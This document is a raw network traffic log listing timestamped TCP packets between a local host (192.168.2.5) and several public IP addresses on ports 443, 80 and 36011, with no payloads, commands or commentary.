Oct 13, 2023 15:21:17.272641897 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.272660017 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.272701979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.274388075 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.274405956 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.274446964 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.274456978 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.274468899 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.274507999 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.276993990 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.277013063 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.277081966 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.277090073 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.277133942 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.278963089 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.278983116 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.279017925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.279026031 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.279038906 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.279079914 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.280816078 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.280836105 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.280889988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.280896902 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.280940056 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.282215118 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.282233953 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.282288074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.282295942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.282337904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.283936977 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.283956051 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.284001112 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.284009933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.284025908 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.284055948 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.285550117 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.285567999 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.285614967 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.285625935 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.285639048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.285806894 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.287111998 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.287131071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.287178993 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.287188053 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.287200928 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.287743092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.288423061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:17.288423061 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:21:17.288595915 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.288616896 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.288655043 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.288662910 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.288678885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.288708925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.290486097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.290503979 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.290651083 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.290659904 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.290725946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.292438030 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.292455912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.292521000 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.292530060 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.292545080 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.294539928 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.294563055 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.294600010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.294608116 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.294621944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.294648886 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.296138048 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.296154022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.296186924 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.296194077 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.296207905 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.296237946 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.300246954 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.300266981 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.300328016 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.300335884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.300358057 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.300378084 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.303201914 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.303220987 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.303270102 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.303278923 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.303293943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.303328991 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.305512905 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.305531025 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.305586100 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.305593967 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.305608988 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.305644989 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.307797909 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.307816982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.307864904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.307873964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.307888985 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.307924032 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.310960054 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.310976982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.311018944 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.311028004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.311042070 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.311078072 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.313719034 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.313736916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.313776016 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.313783884 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.313796997 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.313831091 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.316056013 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.316073895 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.316134930 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.316142082 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.316183090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.317703962 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.317723989 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.317763090 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.317770958 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.317785025 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.317816019 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.319406033 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.319426060 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.319469929 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.319478035 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.319494963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.319525957 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.321913004 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.321930885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.321978092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.321985960 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.322006941 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.322026014 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.324208975 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.324227095 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.324270010 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.324284077 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.324299097 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.326101065 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.326124907 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.326153994 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.326160908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.326178074 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.326201916 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.328505993 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.328525066 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.328582048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.328591108 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.328655005 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.330498934 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.330516100 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.330575943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.330615044 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.330661058 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.332237959 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.332256079 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.332302094 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.332310915 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.332325935 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.332412004 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.334017038 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.334034920 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.334070921 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.334079027 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.334094048 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.334156036 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.336649895 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.336668968 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.336714029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.336723089 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.336736917 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.336765051 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.338861942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.338880062 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.338920116 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.338927984 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.338943005 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.338972092 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.341023922 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.341044903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.341080904 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.341089010 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.341120958 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.341141939 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.343775988 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.343794107 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.343833923 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.343842983 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.343857050 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.343885899 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.345221043 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.345238924 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.345272064 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.345279932 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.345293999 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.345325947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.346867085 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.346887112 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.346935034 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.346944094 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.346961021 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.346987963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.348464966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.348483086 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.348522902 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.348531961 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.348546982 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.348577023 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.349951982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.349971056 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.350002050 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.350008965 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.350024939 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.350054979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.415091038 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415106058 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415165901 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415179014 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415203094 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415291071 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.415337086 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415501118 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415575981 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.415644884 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415658951 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415730953 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.415877104 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415904999 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.415918112 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416057110 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416119099 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.416755915 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416770935 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416800976 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416879892 CEST	49726	36011	192.168.2.5	51.255.152.132
Oct 13, 2023 15:21:17.416912079 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416925907 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.416956902 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.417032003 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.417310953 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.417597055 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.417609930 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.418487072 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.427788973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.427812099 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.427968979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.427968979 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.428000927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.428119898 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.460167885 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.460194111 CEST	36011	49726	51.255.152.132	192.168.2.5
Oct 13, 2023 15:21:17.612584114 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.612612963 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.612984896 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.613015890 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.613239050 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.615861893 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.615880966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.615955114 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.615984917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.616027117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.620162964 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.620182991 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.620255947 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.620286942 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.620330095 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.622797966 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.622821093 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.622881889 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.622891903 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.622908115 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.623756886 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.624826908 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.624845982 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.624890089 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.624897957 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.624914885 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.624941111 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.627686024 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.627708912 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.627749920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.627758980 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.627774954 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.627811909 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.629339933 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.629364014 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.629422903 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.629431963 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.629475117 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.632014036 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.632042885 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.632097960 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.632107973 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.632296085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.633666992 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.633690119 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.633754015 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.633786917 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.633805037 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.634712934 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.635907888 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.635927916 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.635962963 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.635972023 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.635987997 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.637054920 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.637396097 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.637415886 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.637470961 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.637478113 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.637495995 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.638230085 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.639693022 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.639722109 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.639761925 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.639769077 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.639789104 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.639817953 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.642363071 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.642396927 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.642450094 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.642457962 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.642472029 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.642707109 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.644799948 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.644819021 CEST	443	49736	45.130.41.106	192.168.2.5
Oct 13, 2023 15:21:17.644866943 CEST	49736	443	192.168.2.5	45.130.41.106
Oct 13, 2023 15:21:17.644875050 CEST	443	49736	45.130.41.106	192.168.2.5
